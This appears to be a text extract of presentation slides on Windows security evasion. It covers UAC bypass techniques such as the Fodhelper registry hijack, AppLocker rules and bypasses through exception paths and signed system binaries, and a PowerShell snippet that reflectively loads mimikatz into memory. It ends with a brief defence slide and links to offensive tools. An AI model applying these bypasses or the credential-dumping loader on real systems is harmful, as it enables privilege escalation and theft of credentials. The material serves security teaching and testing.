  • 20. Bypass UAC • Using mistake of any autoElevate binary (Using sigcheck for check autoElevate flag) • UACME • DLL Hijacking • autoElevate • Elevated COM interface • SDCLT - Backup command • Fodhelper - Manage Optional Features • Using process or dll injection into Windows Publisher Certificate • Using Windows Update Standalone Installer (wusa.exe) • etc.
  • 21. Bypass UAC with Fodhelper • Fodhelper.exe (%WINDIR%System32fodhelper.exe) • Missing registry • HKCU:SoftwareClassesms-settingsshellopencommand • HKCU:SoftwareClassesms-settingsshellopencommandDelegateExecute • HKCU:SoftwareClassesms-settingsshellopencommand(default)
  • 23. AppLocker • Whitelisting application • Executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers • Windows 7 > • Single computer (secpol.msc), Group Policy Management (gpmc.msc)
  • 24. AppLocker File Type • These are regular .exe and .com applications (cmd.exe, ipconfig.exe, etc.) • Windows Installer files (.msi, .msp, .mst), typically used to install a new software on the machine. • Script files with the following extensions .ps1, .vbs, .vba, .cmd and .js. • Packaged Apps installed through the Microsoft Store • DLL files (.dll and .ocx in the advanced tab).
  • 25. AppLocker Rule • Execution Path • Publisher Information • File Hash
  • 26. Bypass AppLocker • Find exception path • “C:WindowsTasks” • “C:Windowstracing” • Load file from memory (PowerSploit framework) • $ByteArray = [System.IO.File]::ReadAllBytes(“C:usersricharddesktopmimikatz.exe"); • Invoke-expression(Get-Content .Invoke-ReflectivePEInjection.ps1 |out-string) • Invoke-ReflectivePEInjection -PEBytes $ByteArray • Obfuscate exe for bypass hash • Powershell without powershell (Casey Smith) (Powershell Empire) • Registry Key Manipulation • Run PE file by using microsoft tool • C:windowssystem32rundll32.exe • C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe ( install and uninstall applications via the command prompt) • C:WindowsSystem32regsvr32.exe (Install and Uninstall dll file) • C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe (Using to build products in environments where Visual Studio is not installed)
  • 28. Protecting against malware • People: Security Awareness Training • Process: Restrict program install or usage with policy, Updates, Backups, Governance, Intelligence, Incident response plan, and more => Security Team • Technology: Technology supports the team and processes • Backup • Antivirus • Anti-ransomware • Endpoint Detection
  • 29. Q & A
  • 30. Resource • https://www.blackhillsinfosec.com/?p=5555 • https://github.com/nccgroup/Winpayloads • https://www.youtube.com/watch?v=6bUoz5ChTOs • https://github.com/D4Vinci/Dr0p1t-Framework • https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf • https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf • https://github.com/Pepitoh/VBad • https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros • https://twitter.com/Andrew___Morris/status/879712530041626627 • https://github.com/cobbr/ObfuscatedEmpire • https://pentestlab.blog/tag/uac/ • https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/ • https://www.greyhathacker.net/?p=796 • https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189 • https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques • https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting • https://github.com/api0cradle/UltimateAppLockerByPassList